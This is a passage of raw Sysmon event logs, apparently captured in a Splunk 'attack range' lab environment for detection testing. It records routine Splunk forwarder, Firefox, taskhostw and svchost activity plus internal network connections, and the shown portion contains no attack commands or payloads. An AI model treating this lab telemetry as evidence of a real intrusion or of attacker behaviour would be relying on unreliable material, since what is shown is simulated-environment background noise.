Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:21.009{C8EA50B7-1221-6216-3105-000000003802}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:21.009{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-137MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217091Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:22.993{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86C934BC54B0A38845C802A599FDA834,SHA256=F009F3AB39F1C14F62D589B5F7E07F6A512506814764CE879B9FA37E0476D51C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:22.324{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=198EDE2368EB90C8EB481EE4DF18489C,SHA256=F7F10010734D704AC50BD01D1A4BC881EF039C2B64BE66FD39965B37C9001103,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217090Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:20.624{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51371-false10.0.1.12-8000- 23542300x8000000000000000289230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:23.345{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE227461DF2F3954D4A08CD340D52317,SHA256=53D0F4880875432326C379F10A14268C2E59B5BB3CD87F84659315B668CD245C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:24.375{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE64C1389B513E919652D47AD91763E7,SHA256=8349D6E006033AB2AAF3591E519B123E1526E4483117F48140CD26722B2C5829,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217092Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:24.197{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA955A058920B5A259EF80883F7A16FB,SHA256=EC07B72A4ECBE781203C7D056F5B99E574D97B8B3E30BCDC4275D0131867E1E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217093Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:25.229{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9FB9517EBC2D0CD91959D02EAF65F3E,SHA256=93E1924F1B81126DCEADED829EB8B245FB6F0C6E4A52850260C921D484A01198,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:23.549{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53514-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:25.391{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34DE66F5AD61DDE2EED143A21311564D,SHA256=7A0438B5C2DB1B5632E168905077C67BC87BAC991D0C6A4DDD4A7EE26F8C1D5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217094Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:26.229{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6644FB2B798456C5B26BDE0347F9155,SHA256=6572D7774D09F3DF04CEFB223B8F596FCF280A2E80158C25CB2735CD85EA3014,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:26.408{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=494B77C998E88983FFCEFF6B7B203235,SHA256=3E1A1D162CAD0D44B730554E46C78A0F22C6A14E435333A9318893FFEBC6B3B3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:26.008{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000289235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:26.008{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:26.008{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF812363.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217095Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:27.230{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04C139EAED286869810162048B52C204,SHA256=FC448FD6C29C3A260A99E89BD6598B5001A00344756235DE36F342D0104B82A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:27.443{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A149E002B2901890633F8B8CDD3584A8,SHA256=80F77D35DF3C0EB4815AA4D5FF216BD1310F3FF6989179331D5F302BB15FF71A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:28.460{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=931D1302EB6EFC07D55F8A12A5404DA5,SHA256=DFF710C684139803C82A231EC687A1B2EF375C1EA357679E8AF66CB50467F678,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217097Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:26.518{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51372-false10.0.1.12-8000- 23542300x8000000000000000217096Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:28.262{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD15B6C78681559229FDFA3C8DAB5298,SHA256=0D403E35EAE0D52D6AE79A4E8CDF58FAE6C0B9E3D9EBFF7484E00C92F5C37617,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:29.475{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49E484027F05C3F71A2C9A92D28AA2B0,SHA256=52C01AAA90B2BF5C2BA31EB495FAF5E59E3035F79C8BE45E4D1CA40915347BAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217098Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:29.262{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BFE224A7FFC79BB833C8D28849C0072,SHA256=723D2EA1395355C97E678E0A81AEEF723E30679FF865ED8D936B87F7E511E08F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217100Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:30.310{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=01A9DFDE7A74CA82EEC0503295F11BF0,SHA256=64135613472B8152842D0DF335691567A34A812C33B636D01D737F8A62BAB80B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217099Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:30.263{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A14864A804BD71413C105726EE3CC6AA,SHA256=928340D55DAEA51B21D4B1174CD8BFB9468ED943033CB32673146620B1F2C0EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:30.842{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000289242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:28.733{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53515-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:30.490{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B7C04336B04DEFC5C2BC34FEB9BF4E7,SHA256=73BC0E18996753965673B872AB1AF9C4E818634DCC6523EE448DF9C37341BFB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217101Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:31.263{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AE2F8C73611FED12E62A52BEF672B56,SHA256=0BD200F37F1EFDBFB5CFBCBF7D39CBB527A21F537922C9BBFDBF0E0F591331C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:31.505{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABD5FA70FEA2FF2EACE5851AE5BAA67E,SHA256=9646428AA61553ABC36CD54C0CF3C0CFAA6731F0E948929DDAF313952AD49BE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217102Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:32.264{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4ACD49B160F434E50B521350D72B75B,SHA256=20D063827E3BE1E38891704F4EC0349C6A20C076D1A441DC5FBDE527D3841FE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:32.539{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6F1CC997C4AE983326F8C93DD86E571,SHA256=00787C0D7FE9068E831FF649AFEF30D27E8F0126B765B105001543E9C6C7C22F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217103Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:33.389{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9A9BAAE6A24028EDD0F7D294E9E3295,SHA256=A8B1DAEFF1400E10ED0D81D5ED497F847A09ADC55FD61A60D00A7977624EAD4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:33.557{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=066E7570121D0E04891D06631BE02879,SHA256=836B2B5BE4FDB37362458CE7E95B3601F7A0BDDD8BE0E8CC398DA57E6A0D1F1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:33.357{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=9220CFA5C4BBE453ECC0F13D1DD7AB1F,SHA256=77186281E837A1A38C58E04750B35814C29A09CE383D98FE507AD2CEB1972849,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:34.560{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABA833C2855BA67BA1B87030012E7636,SHA256=6FB7F583ED769AAAD9CFAA014E2B2A1C773E09CE07934F7BAE4407388595B585,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217104Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:34.609{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EFE154DD52FFDA4242726274F489C49,SHA256=8561003DA1393B1977EFE1480E79AF711C2EA316BAE6D93EE53B0C0D329D65D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:34.123{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000217106Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:32.459{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51373-false10.0.1.12-8000- 23542300x8000000000000000217105Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:35.609{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1A318F9E8493A2B7FF2DE36932EA98C,SHA256=96ED0056D73181EEE1A098F23C0A3CFD288E9CADBB01B757B6A516FC1C9239A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:35.576{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D16FB4541CF51CDAFD442AC8FE3D8937,SHA256=83F89C2696E48173734A286B10359FC48F564C48CF897C146E04967203B5C7FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217107Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:36.610{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B591366C32C9E741209F3481E60CB78,SHA256=9A746008963F465DCEBB8648D3C87103DAA49DA4FAE54A6CF30430F2A0E8E529,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:34.568{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53516-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:36.592{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D816FFAC0F44FA17A55B70640D622B2,SHA256=232F556BBA7FE51EAACB3389FA2C4EA02045C7CA23AF04204D31F5DCFE3289BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217108Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:37.829{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EA392D9F7D8805F76322E3DA662F29A,SHA256=B7D392FD7B03069F01811C7C7E20D8C1AF2F8D2E3C085140AF8D383B2315BFE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:37.607{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA7A6D32585469DB5F0BE7A601110E26,SHA256=D9FBC02E27A165836A48B673070FDA851E608AB75EF098E8BCAA9488533513BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:38.607{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 